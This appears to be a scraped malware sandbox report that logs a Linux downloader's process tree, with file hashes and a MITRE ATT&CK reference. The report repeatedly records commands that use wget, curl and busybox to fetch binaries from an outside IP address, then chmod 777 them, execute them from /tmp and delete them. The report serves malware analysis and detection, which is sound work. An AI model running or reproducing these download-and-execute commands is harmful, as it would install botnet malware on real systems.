/usr/bin/wgetwget http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV2⤵PID:883
-
-
/bin/chmodchmod 777 oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV./oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm oNW50A3lhWCBxfWTEHAFjImdibHABAcsbV2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji2⤵PID:889
-
-
/bin/chmodchmod 777 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji./7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm 7dFbDwx6PU7WvBfmHWPgFF9BBHTf5wooji2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN2⤵PID:895
-
-
/bin/chmodchmod 777 NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN./NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm NBvIRJuFuFJmi4KlvtkSSNS8OQdrQjMhUN2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU72⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU72⤵PID:901
-
-
/bin/chmodchmod 777 lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU72⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU7./lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU72⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm lLbHChf1iQAU8ygYy2LQb9aeqQPm5T5lU72⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx22⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx22⤵PID:907
-
-
/bin/chmodchmod 777 vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx22⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx2./vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx22⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm vQ63tKW9jaDHKeDS6UZq98zWamMr1gwrx22⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G2⤵PID:913
-
-
/bin/chmodchmod 777 fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G./fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm fTibODpmVMM8UOxhb1q9woUY1lrBDxOM8G2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI2⤵PID:919
-
-
/bin/chmodchmod 777 gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI./gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm gBs9wtUvbF3o0SjOQ4DPC1Y7iVqWtr8NLI2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn2⤵PID:927
-
-
/bin/chmodchmod 777 uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn./uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm uvhV9m5KaLeN2x38H0VzxUaS8EUtxlgrsn2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p2⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p2⤵PID:933
-
-
/bin/chmodchmod 777 15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p2⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p./15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p2⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm 15abOuZMV7A9KJTFH87FM9kB2d3TVsSk2p2⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG2⤵PID:939
-
-
/bin/chmodchmod 777 jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG./jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm jTU0dNOxRxwGywxWwrw7oX9kMcJa186GKG2⤵PID:942
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7